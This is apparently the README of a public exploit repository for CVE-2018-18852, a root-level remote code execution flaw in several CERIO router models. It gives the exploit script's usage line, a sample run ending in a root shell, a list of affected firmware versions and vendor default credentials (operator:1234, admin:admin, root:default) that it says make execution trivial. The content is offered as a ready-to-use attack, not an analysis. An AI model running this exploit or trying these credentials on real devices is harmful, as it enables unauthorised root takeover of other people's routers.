hook-s3c (github.com/hook-s3c), @hook_s3c on twitter
Working Python PoC for CVE-2018-18852, originally appearing on; https://github.com/hook-s3c/CVE-2018-18852
CERIO Router models and variants of, DT300N, DT100G, AMR-3204, WMR-200N are vulnerable to an authenticated web-based RCE as root user.
Exists as an 0day undisclosed advisory; https://www.fortiguard.com/zeroday/FG-VD-18-149
Vendor default credentials are usually present, so execution is trivial.
Architecture is MIPS.
Usage: exploit.py <ipaddress> <port> <creds>
$ python ./exploit.py 127.0.0.1 8080 admin:admin
[*] ================================================
[*] CERIO RCE CVE-2018-18852, confirmed on;
[*] - CERIO DT-300N-NGS-M - fw: Pme-CPE-AP12X V1.0.3
[*] - CERIO DT-300N - fw: Cen-CPE-N2H10A V1.0.14, Cen-CPE-N2H10A V1.1.6, Cen-CPE-N2H10A V1.1.7
[*] - CERIO DT-100G-N - fw: Cen-AP-N2H10A V1.0.8
[*] - CERIO DT-100G - fw: Cen-WR-G2H5 V1.0.7
[*] - CERIO DT-100GX-N - fw: Cen-AP-N2H8A V1.0.18
[*] - CERIO AMR-3204G - fw: Cen-AC V2.0.19
[*] - CERIO WMR-200N - fw: Cen-HS-N2H1 V1.0.6c Test
[*]
[/] by hook (@hook_s3c) https://github.com/hook-s3c/CVE-2018-18852
[/] Greetz to vap0rsquad, ThugCrowd, $noHat$, r0bl0xgang, Udderly Amoosing, illmob,
[/] The Many Hats Club, Cyber.Phunk, WAC, SHAM, 0x00sec, John McAfee
[/] Go cop YTCracker's Introducing Neals, gov overreach is no joke - wake the fuck up
[*] ================================================
root@cerio:~# id
[!] This may not be the right model (DT-300N-NGS-M), trying again
[+] Sucessfully grabbed pid token: 1312
uid=0(root) gid=0(root)
root@cerio:~#
- operator:1234
- admin:admin
- root:default
Shoutout to vap0rsquad, ThugCrowd,
HTP!!!! YEET